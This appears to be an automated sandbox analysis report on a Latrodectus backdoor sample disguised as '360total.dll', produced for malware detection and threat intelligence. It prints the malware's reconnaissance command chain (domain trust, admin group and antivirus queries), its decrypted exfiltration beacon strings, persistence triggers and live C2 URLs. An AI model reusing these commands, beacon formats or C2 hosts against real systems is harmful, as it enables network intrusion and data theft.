Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
360total.dll.dll

Overview

General Information

Sample name:360total.dll.dll
(renamed file extension from exe to dll)
Original sample name:360total.dll.exe
Analysis ID:1432373
MD5:bd3a3714ee9a071ebeb59ac91d9ebb5a
SHA1:55110a221f20a4ceec34c58d0179fa31f8c102e9
SHA256:4cf2b612939359977df51a32d2f63e2cb0c6c601e114b8e4812bd548d1db85fe
Tags:exe
Infos:

Detection

Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Deletes itself after installation
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 3872 cmdline: loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6524 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 1960 cmdline: rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • rundll32.exe (PID: 180 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1 MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 360 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 6428 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • cmd.exe (PID: 3848 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • systeminfo.exe (PID: 5840 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
              • WmiPrvSE.exe (PID: 1012 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • cmd.exe (PID: 5544 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • nltest.exe (PID: 4508 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
          • cmd.exe (PID: 6576 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • nltest.exe (PID: 6516 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
          • cmd.exe (PID: 6600 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 5856 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • cmd.exe (PID: 1472 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 2944 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • cmd.exe (PID: 4500 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 5496 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
              • net1.exe (PID: 5348 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • WMIC.exe (PID: 2508 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7988 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 2272 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
              • net1.exe (PID: 1708 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • cmd.exe (PID: 6832 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 5136 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 3728 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • cmd.exe (PID: 932 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6560 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6200 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 1964 cmdline: C:\Windows\system32\WerFault.exe -u -p 6200 -s 456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 5952 cmdline: C:\Windows\system32\WerFault.exe -u -p 6200 -s 456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 2364 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7896 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime MD5: EF3179D498793BF4234F708D3BE28633)
  • chrome.exe (PID: 3624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Unidentified 111 (Latrodectus), LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
    00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
      00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
        00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
          00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.14614300000.2.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
              3.2.rundll32.exe.146142f0000.1.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                3.2.rundll32.exe.146142f0000.1.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                  4.2.rundll32.exe.237c16b0000.1.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                    3.2.rundll32.exe.14614300000.2.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4500, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5496, ProcessName: net.exe
                      Sigma detected: Net.exe Execution
                      Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 5856, ProcessName: net.exe
                      Sigma detected: Share And Session Enumeration Using Net.EXE
                      Source: Process startedAuthor: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 5856, ProcessName: net.exe
                      Sigma detected: Suspicious Network Command
                      Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1 , ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 180, ParentProcessName: rundll32.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 360, ProcessName: cmd.exe

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dllReversingLabs: Detection: 18%
                      Multi AV Scanner detection for submitted file
                      Source: 360total.dll.dllReversingLabs: Detection: 18%
                      Sample uses string decryption to hide its real strings
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c ipconfig /all
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c systeminfo
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c nltest /domain_trusts
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c net view /all /domain
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c net view /all
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &ipconfig=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c net group "Domain Admins" /domain
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c net config workstation
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /c whoami /groups
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &systeminfo=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &domain_trusts=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &domain_trusts_all=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &net_view_all_domain=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &net_view_all=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &net_group=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &wmic=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &net_config_ws=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &net_wmic_av=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &whoami_group=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "pid":
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "%d",
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "proc":
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "%s",
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "subproc": [
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &proclist=[
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "pid":
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "%d",
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "proc":
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "%s",
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "subproc": [
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &desklinks=[
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: *.*
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "%s"
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Update_%x
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Custom_update
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: .dll
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: .exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Updater
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "%s"
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: rundll32.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: "%s", %s %s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: runnung
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: :wtfbbq
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %s%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: files/bp.dat
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %s\%d.dll
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %d.dat
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %s\%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: init -zzzz="%s\%s"
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: front
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: /files/
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Facial
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: !"$%&()*wp
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: .exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: POST
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: GET
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: curl/7.88.1
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: pN
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: URLS
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: COMMAND
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: ERROR
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: <html>
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: <!DOCTYPE
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %s%d.dll
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: 12345
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &stiller=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %s%d.exe
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: LogonTrigger
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %x%x
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: TimeTrigger
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: PT0H%02dM
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &mac=
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %02x
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: :%02x
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: PT0S
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &computername=%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: &domain=%s
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: \*.dll
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: \Registry\Machine\
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: https://jarinamaers.shop/live/
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: https://startmast.shop/live/
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: AppData
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Desktop
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Startup
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Personal
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Local AppData
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: \update_data.dat
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: pN
                      Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpackString decryptor: URLS|%d|%s
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_000000018003BC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E5E5C CryptUnprotectData,RtlDeleteBoundaryDescriptor,8_3_000001E3B57E5E5C
                      Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49727 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.42.73.28:443 -> 192.168.2.5:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.207:443 -> 192.168.2.5:49781 version: TLS 1.2
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr

                      Spreading

                      barindex
                      Performs a network lookup / discovery via net view
